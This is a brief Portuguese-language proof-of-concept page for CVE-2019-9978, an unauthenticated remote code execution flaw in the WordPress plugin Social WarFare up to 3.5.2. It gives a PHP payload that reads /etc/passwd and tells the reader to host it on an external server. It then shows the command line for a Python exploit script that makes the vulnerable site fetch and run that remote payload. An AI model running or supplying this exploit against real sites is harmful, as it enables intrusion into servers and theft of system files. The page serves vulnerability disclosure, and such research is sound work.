
CVE-2019-9978 - (PoC) RCE no plugin Social WarFare (<=3.5.2)
CVE-2019-9978 - (PoC) RCE no Plugin Social WarFare (<=3.5.2)
Foi descoberta uma execução remota de código não autenticada na funcionalidade que lida com importação de configurações. Um usuário pode aproveitar o uso de RFI para RCE.
Copie o seguinte payload:
<pre>system('cat /etc/passwd')</pre>
Salve-o com o nome de arquivo: payload.txt e faça upload em um servidor. A URI deve se parecer com: http(s)://yoursite.com/payload.txt. Por fim, forneça suas opções --target e --payload-uri:
$ python cve-2019-9978.py --target http://vulntarget.com \
--payload-uri http://yourpayloadsite.com/payload.txt

Pesquisador: Luka Sikic
Link: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
Autor: @hash3liZer